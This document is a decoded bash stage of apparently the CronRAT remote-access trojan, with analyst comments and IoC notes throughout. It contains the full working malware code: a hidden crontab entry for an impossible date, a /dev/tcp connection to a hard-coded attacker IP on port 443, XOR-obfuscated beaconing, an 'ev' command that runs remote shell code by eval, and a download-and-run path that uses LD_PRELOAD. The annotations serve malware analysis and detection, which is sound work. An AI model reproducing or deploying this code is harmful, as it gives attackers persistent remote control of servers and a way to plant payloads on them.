This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
# Analyst notes for this decoded stage (the loader that invokes it is not shown here).
# Strict mode: -e/-E/-u plus pipefail. The ERR trap prints the failing line as
# "L<n>", deletes the dropped file via O70 and exits -1 (bash reports status 255).
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
# Constant placed in every outbound message header (zero-padded to O9 digits in O83).
O54=4
# Cleanup: remove the dropped payload file when O57 has been set (to any value,
# even empty) and names a regular file. Called from the ERR trap and from O85.
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
fi
}
# Fatal exit: print "F<code>" to stdout, run cleanup, exit with <code>.
# Codes used in this stage: 0 normal/gated exit, 1 no free fd, 2 no drop directory,
# 3 outbound message too long, 4 inbound message too long, 5 connect failed,
# 6 required tool missing, 7 dropped payload died, 8 `type` probe failed,
# 9 crontab missing, 10 setuid/setgid probe tripped.
function O85()
{
echo "F${1}"
O70
exit ${1}
}
# Capability probe: echoes 1 when `type` can resolve ${1} (builtin, function, alias
# or command on PATH), else 0. ${1} is unquoted, so an empty argument runs a bare
# `type` with no operands.
function O73()
{
if [[ "$(type ${1} &> /dev/null; echo ${?})" == 0 ]]; then
echo 1
else
echo 0
fi
}
# Echoes 1 when the file `command -v ${1}` resolves to carries the setuid or setgid
# bit, else 0. In this stage it is only ever called with an empty argument, so the
# test presumably always yields 0 on a normal shell — intent unclear from here.
function O63()
{
O27=$(command -v "${1}")
if [[ -u "${O27}" || -g "${O27}" ]]; then
echo 1
else
echo 0
fi
}
# Environment gate: abort with codes 8/10/6/9 unless the required tools are present.
if [[ $(O73 "") == 0 ]]; then
O85 8
fi
if [[ $(O63 "") == 1 ]]; then
O85 10
fi
# printf, ps, od, seq, dd and awk are used by the framing/XOR helpers and the
# process check below; crontab is needed by the self-removal command (O72).
if [[ $(O73 "printf") == 0 || $(O73 "ps") == 0 || $(O73 "od") == 0 || $(O73 "seq") == 0 || $(O73 "dd") == 0 || $(O73 "awk") == 0 ]]; then
O85 6
fi
if [[ $(O73 "crontab") == 0 ]]; then
O85 9
fi
# Message type codes: passed as the second argument to O83 and sent as one byte
# after the key byte. O12 (3) is not used anywhere in this stage.
O15=1
O18=2
O12=3
O19=4
O16=5
O13=6
O7=7
# Framing: the length field is O1 (10) decimal digits, so O10 (ten 9s) is the
# largest payload length accepted in either direction; O9 (3) is the width of the
# O54 field in the header.
O1=10
O10=$(printf '9%.0s' $(seq 1 ${O1}))
O9=3
# Candidate drop locations, one entry per "dir;name|name|..." string. The loop
# further down takes the first directory that O66 accepts and picks one name at
# random. Detection: these names under /dev/shm, /run/user/<uid>, /tmp, /var/tmp
# and the working directory are file IoCs (note the misspelling "worker_cahce" and
# the $RANDOM / date +%N suffixes, which vary per run).
O36=('/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared' "/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock" "/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM" '/var/tmp;php_cache|www_cache|worker_cahce' "$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css")
# Result codes of O72 (crontab self-removal): removed / entry not found / write failed.
O25=0
O17=1
O5=2
# Self-removal from the invoking user's crontab: rebuilds `crontab -l` without any
# line that starts with "53 23 31 2 3 " (the impossible "31 February" schedule that
# hides the loader entry) and reinstalls the result. Echoes O17 if no such line
# existed, O5 if the `crontab -` write failed, O25 on success; no trailing newline.
# Detection: a crontab line scheduled for minute 53, hour 23, day 31, month 2 is
# the persistence IoC.
function O72()
{
local new_cron=""
local O46=false
# `read` without -r and an unquoted variable: backslashes in crontab lines are
# interpreted, leading/trailing whitespace is trimmed.
while read O39; do
if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then
new_cron+="${O39}\n"
else
O46=true
fi
done <<< "$(crontab -l 2>/dev/null)"
if [[ "${O46}" == false ]]; then
echo -n ${O17}
return
fi
# %?? strips the literal two-character "\n" appended to the last line; echo -e
# then turns the remaining "\n" sequences into real newlines.
echo -e "${new_cron%??}" | crontab - &>/dev/null
if [[ $? != 0 ]]; then
echo -n ${O5}
return
fi
echo -n ${O25}
}
# Uptime in whole seconds (first field of /proc/uptime, rounded by awk) plus one.
function O71()
{
echo $(( $(awk '{printf "%0.f", $1}' < /proc/uptime) + 1 ))
}
# Seconds elapsed since local midnight (uses GNU `date -d`).
function O65()
{
local today="$(date +'%F')"
local now=$(date +'%s')
local midnight=$(date -d "${today} 0" +%s)
echo "$((${now} - ${midnight}))"
}
# Timing gate. O23 = uptime in 30-minute units, O3 = minutes since midnight mod 120.
# Unless the host booted 30-60 minutes ago (O23 == 1) or this is the first minute of
# an even-numbered hour (O3 == 0), exit quietly with status 0. This is what throttles
# beaconing to roughly once every two hours plus once shortly after boot; how often
# the loader schedules this stage is not visible here.
O23=$(( $(O71) / (30 * 60) ))
O3=$(( ($(O65) / 60) % 120 ))
if [[ ${O23} -ne 1 ]]; then
if [[ ${O3} -ne 0 ]]; then
O85 0
fi
fi
# Hex-encode ${1}, or stdin when no argument is given: od -An -vtx1 with the spaces
# and newlines stripped. Used below to turn the one-byte key into a 16# number.
function O81()
{
echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n'
}
# Turn a whitespace-separated list of decimal byte values (${1} or stdin) into the
# corresponding raw bytes via awk's %c, in the C locale so values above 127 are
# emitted as single bytes. Inverse of the decimal form produced in O79.
function O76()
{
echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}'
}
# Find the PID(s) holding file ${1} open, trying lsof -t and then fuser under /bin
# and /sbin, and print the last whitespace-separated field of the result.
# Note: none of the `echo -1` error paths is followed by `return`, so on failure the
# function prints -1 and then still falls through to the final awk, producing a
# second output line. The caller compares the captured output with -ne -1.
function O84()
{
if [[ $(O73 "/bin/lsof") == 0 && $(O73 "/sbin/lsof") == 0 && $(O73 "/bin/fuser") == 0 && $(O73 "/sbin/fuser") == 0 ]]; then
echo -1
fi
local O41=-1
if [[ $(O73 "/bin/lsof") == 1 ]]; then
O41=$(/bin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/sbin/lsof") == 1 ]]; then
O41=$(/sbin/lsof -t "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
elif [[ $(O73 "/bin/fuser") == 1 ]]; then
O41=$(/bin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
# fuser prints PIDs padded with spaces; '{$1=$1};1' squeezes the whitespace.
O41=$(echo ${O41} | awk '{$1=$1};1')
elif [[ $(O73 "/sbin/fuser") == 1 ]]; then
O41=$(/sbin/fuser "${1}" 2>/dev/null)
if [[ ${?} -ne 0 ]]; then echo -1; fi
O41=$(echo ${O41} | awk '{$1=$1};1')
fi
echo "${O41}" | awk -F' ' '{print $NF}'
}
# Run "$@" with file descriptors 0-9 closed, so the spawned process inherits neither
# the terminal nor the C2 socket held on fd O56 (O74 can pick any fd up to 1024, so
# a higher fd would not be closed by this list).
function O75()
{
"$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&-
}
# Find an unused file descriptor in 1..1024: the first one on which both a write
# (>&) and a read (<&) redirection fail, i.e. both probes exit 1. Echoes the fd
# number, or -1 if none is free. -e/-E are suspended because the probes are
# expected to fail.
function O74()
{
set +eE
local O41=-1
for O61 in {1..1024}; do
local _o_="$(true 2>/dev/null >&${O61}; echo $?)"
local _i_="$(true 2>/dev/null <&${O61}; echo $?)"
if [[ "${_o_}${_i_}" == "11" ]]; then
O41=${O61}
break
fi
done
set -eE
echo ${O41}
}
# Echoes the grep status of a /proc/mounts lookup: 0 when the mount point ${1}
# (second field) is mounted with the noexec option, 1 otherwise. ${1} is inserted
# into the regex unescaped, so paths with regex metacharacters may mismatch.
# O41 is deliberately not local here; it is also used as a scratch name elsewhere.
function O68()
{
set +eE
O41=$(grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts; echo $?)
set -eE
echo ${O41}
}
# `df -P` lookup for ${1}: echoes the first column of the last output line (the
# device, or a pseudo-filesystem name such as tmpfs), except for /dev/mapper
# devices where the sixth column (the mount point) is echoed instead. Echoes 1 when
# df fails.
function O69()
{
set +eE
O41=$(df -P "${1}" 2>/dev/null)
if [[ ${?} -eq 0 ]]; then
O41=$(echo "${O41}" | tail -1)
if [[ "${O41}" == /dev/mapper/* ]]; then
O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6)
else
O41=$(echo "${O41}" | cut -d' ' -f1)
fi
else
O41=1
fi
set -eE
echo ${O41}
}
# Split ${2} on the single-character separator ${1} and echo all fields separated
# by spaces. `$"..."` is bash's locale-translation quoting and behaves like "..."
# here. Callers word-split the unquoted output back into an array.
function O64()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[@]}"
}
# Split ${2} on the single-character separator ${1} and echo field number ${3}
# (0-based). Used to unpack the "|"-separated parameter message from the C2.
function O62()
{
local IFS=$"${1}"
read -r -a arr <<< "${2}"
echo "${arr[${3}]}"
}
# Drop-location test: echoes 1 when ${1} (symlinks resolved via realpath) is an
# existing, writable directory whose mount is not flagged noexec, else 0. A dangling
# symlink yields 0. For tmpfs the path itself is passed to O68; for other non-mapper
# filesystems O69 returns the device name, which O68's regex (second field = mount
# point) does not appear to match, so those directories are accepted regardless.
function O66()
{
local O41=0
local O50="${1}"
if [[ -L "${O50}" ]]; then
if [[ -e "${O50}" ]]; then
O50=$(realpath "${O50}")
else
echo 0
return
fi
fi
O31=$(O69 "${O50}")
if [[ "${O31}" != "1" ]]; then
if [[ "${O31}" == "tmpfs" ]]; then
O31="${O50}"
fi
# O68 echoes 1 when grep did NOT find noexec on the mount.
if [[ $(O68 "${O31}") -eq 1 ]]; then
if [[ -e "${O50}" && -d "${O50}" && -w "${O50}" ]]; then
O41=1
fi
fi
fi
echo ${O41}
}
# Setup: reserve a free fd (O56), choose a drop directory and a random filename
# (O57), then open the C2 channel with bash's built-in /dev/tcp. 796077735 is an
# IPv4 address written as a single decimal integer (47.115.46.167) and 0x1bb is
# port 443. Detection: an outbound TCP/443 connection opened by bash itself from a
# cron context, and the drop filenames listed in O36, are the network/host IoCs.
O56=$(O74)
if [[ ${O56} -eq -1 ]]; then
O85 1;
fi
O55="-1"
O58="-1"
O57="-1"
for O35 in "${O36[@]}"; do
# Unquoted $(O64 ...) relies on word splitting to rebuild the arrays.
O28=($(O64 ';' "${O35}"))
O50="${O28[0]}"
if [[ $(O66 "${O50}") -eq 1 ]]; then
O26=($(O64 '|' "${O28[1]}"))
O55="${O50}"
# One candidate name chosen at random from the "|"-separated list.
O58="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}"
O57="${O55}/${O58}"
break
fi
done
if [[ "${O55}" == "-1" || "${O58}" == "-1" || "${O57}" == "-1" ]]; then
O85 2;
fi
# eval is required to use the computed fd number in the redirection; -e is
# suspended so a refused connection reaches `O85 5` instead of the ERR trap.
set +eE
eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5
set -eE
# Read and discard the first 26 bytes from the server (presumably a banner).
eval "head -c "26" <&${O56}" &> /dev/null
# One random key byte from /dev/urandom, echoed as a decimal value. An empty read,
# a newline or a single quote are replaced by 'X', '1' and 'h' — presumably because
# those bytes would break the single-quoted eval string built in O83.
function O67()
{
O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null)
if [[ -z ${O60} ]]; then
O60='X';
fi
if [[ ${O60} == $'\n' ]]; then
O60='1';
fi
if [[ ${O60} == $'\'' ]]; then
O60='h';
fi
echo $(( 16#$(O81 "${O60}") ))
}
# Encode for transmission: XOR every character of ${1} with the one-byte key ${2},
# emit the results as a space-separated decimal list, convert that to raw bytes
# (O76) and base64-encode without line wrapping. Single-byte XOR with a key sent in
# clear is obfuscation only, not encryption.
function O79()
{
local O41=""
for ((i=0; i < ${#1}; i++)); do
# "'c" makes printf %d yield the character's code point.
O51=$((10#$(printf "%d" "'${1:$i:1}")))
O52=$(printf '%02d ' $((${2} ^ ${O51})) )
O41="${O41}${O52}"
done
O76 "${O41}" | base64 -w0 -
}
# Decode a received payload: base64-decode ${1}, XOR each byte with key ${2}
# (walking the hex dump two characters at a time) and print the result. The final
# unquoted echo collapses whitespace and is subject to glob expansion.
function O78()
{
local O41=""
O53=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n')
O32=$(echo "${1}" | base64 -w0 -d - | wc -c)
for ((i=0; i < $(( ${O32} * 2 )); i+=2)); do
O51=$((16#$(printf ${O53:$i:2})))
# Octal escape via printf reconstructs the decoded byte.
O52=$(printf \\$(printf '%03o' $((${2} ^ ${O51})) ) )
O41="${O41}${O52}"
done
echo ${O41}
}
# Send one framed message on fd O56: key byte (fresh from O67), type byte (${2}),
# O54 zero-padded to O9 digits, the payload length zero-padded to O1 digits, then
# the base64 of the XOR-obfuscated payload ${1}. Aborts with code 3 if the encoded
# payload exceeds O10 characters. eval is needed to redirect to the computed fd;
# the message is embedded in a single-quoted string.
function O83()
{
O60=$(O67)
O21=$(O76 "${O60}")
O8=$(O76 "${2}")
O30=$(O79 "${1}" $O60)
O49=${#O30}
if [[ ${O49} -gt ${O10} ]]; then
O85 3;
fi
O44=$(printf "%0${O9}d" ${O54})
O45=$(printf "%0${O1}d" ${O49})
eval "echo -n '${O21}${O8}${O44}${O45}${O30}' >&${O56}"
}
# Receive one framed message from fd O56: 1 key byte, 1 type byte, O9 bytes that
# are read but ignored, an O1-digit decimal length, then the payload. The payload is
# decoded with O78 using the received key, unless ${1} is "true" (raw mode, used for
# the base64 file download). Aborts with code 4 if the length exceeds O10.
function O80()
{
O20=${1:-false}
O60=$(head -c "1" <&${O56})
O29=$(head -c "1" <&${O56})
O37=$(head -c "${O9}" <&${O56})
O43=$(head -c "${O1}" <&${O56})
O49=$((10#${O43}))
if [[ ${O49} -gt ${O10} ]]; then
O85 4;
fi
O38=$(head -c "${O49}" <&${O56})
O22=$(( 16#$(O81 "${O60}") ))
if [[ ${O20} == true ]]; then
O6="${O38}"
else
O6=$(O78 "${O38}" ${O22})
fi
echo "${O6}"
}
# Discard ${1} bytes from the C2 socket. Not called anywhere in this stage.
function O82()
{
head -c "${1}" <&${O56} > /dev/null
}
# Close the C2 socket (fd O56); eval is needed for the computed fd number.
function O77()
{
eval "exec ${O56}>&-"
}
# Main exchange. Handshake: a fixed token (type 1), "cio" (type 2) and a
# 128-hex-character identifier (type 2); then one command is read from the C2.
# Commands handled here: "sd" (remove self from crontab, report, exit), "ev" (eval
# the next message as shell and return its output, type 6), anything that
# evaluates arithmetically to 0 (exit), otherwise the "prm"/"dwn" flow: receive
# "|"-separated parameters, receive a base64 file, write it to the drop path and
# run the requested executable detached with LD_PRELOAD pointing at that file.
# Detection: LD_PRELOAD set to a file under /dev/shm, /tmp, /var/tmp, /run/user or
# the cwd; a child of a cron shell started with fds 0-9 closed; the crontab IoC.
O83 "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" ${O15}
O83 "cio" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
O34=$(O80)
if [[ "${O34}" == "sd" ]]; then
set +eE
O59=$(O72)
set -eE
# Report the O72 result: type 4 on not-found/failed, type 7 (then plain exit)
# on success, type 5 for any other value.
if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then
O83 "SD${O59}" ${O19}
elif [[ ${O59} -eq ${O25} ]]; then
O83 "SD${O25}" ${O7}
echo "SD"
exit 0
else
O83 "SD${O59}" ${O16}
fi
O83 "cex" ${O18}
O85 0
fi
if [[ "${O34}" == "ev" ]]; then
# Remote shell: the next decoded message is executed verbatim by eval.
O48=$(O80)
O59=$(eval "${O48}")
if [[ ! -z "${O59}" ]]; then
O83 "${O59}" ${O13}
fi
O83 "cex" ${O18}
O85 0
fi
# Arithmetic comparison of a string: non-numeric commands are treated as variable
# names, so an empty or "0" message (and unset names) ends the session here.
if [[ ${O34} -eq 0 ]]; then
O85 0
fi
O83 "prm" ${O18}
O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18}
# Parameter message fields, "|"-separated: 0 drop path, 1 env var name, 2 working
# directory, 3 env var value, 4 executable, 5 single argument.
O11=$(O80)
O2=$(O62 '|' "${O11}" 0)
O0=$(O62 '|' "${O11}" 1)
O33=$(O62 '|' "${O11}" 2)
O40=$(O62 '|' "${O11}" 3)
O42=$(O62 '|' "${O11}" 4)
O47=$(O62 '|' "${O11}" 5)
# The server may override the drop path if its directory passes O66.
if [[ "${O57}" != "${O2}" ]]; then
if [[ $(O66 $(dirname "${O2}")) -eq 1 ]]; then
O57="${O2}"
fi
fi
O83 "dwn" ${O18}
# Raw-mode receive: the payload is base64 of the file, decoded straight to disk.
O4=$(O80 true)
echo "${O4}" | base64 -w0 -d - > "${O57}"
set +eE
# Launch detached (fds closed) in the background with the dropped file preloaded,
# then capture whatever O84 prints for the PID holding that file open.
O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}")
set -eE
if [[ ${O24} -ne -1 ]]; then
O14=5
# Poll the process for 5 seconds; report "ser" (type 4) and exit 7 if it vanishes,
# "ssc" (type 7) if it is still alive afterwards.
while [[ ${O14} -ne 0 ]]; do
if ps -p ${O24} &> /dev/null; then
true
else
O83 "ser" ${O19}
O85 7
fi
sleep 1
O14=$((${O14} - 1))
done
O83 "ssc" ${O7}
else
O83 "sun" ${O16}
fi
O83 "cex" ${O18}
O77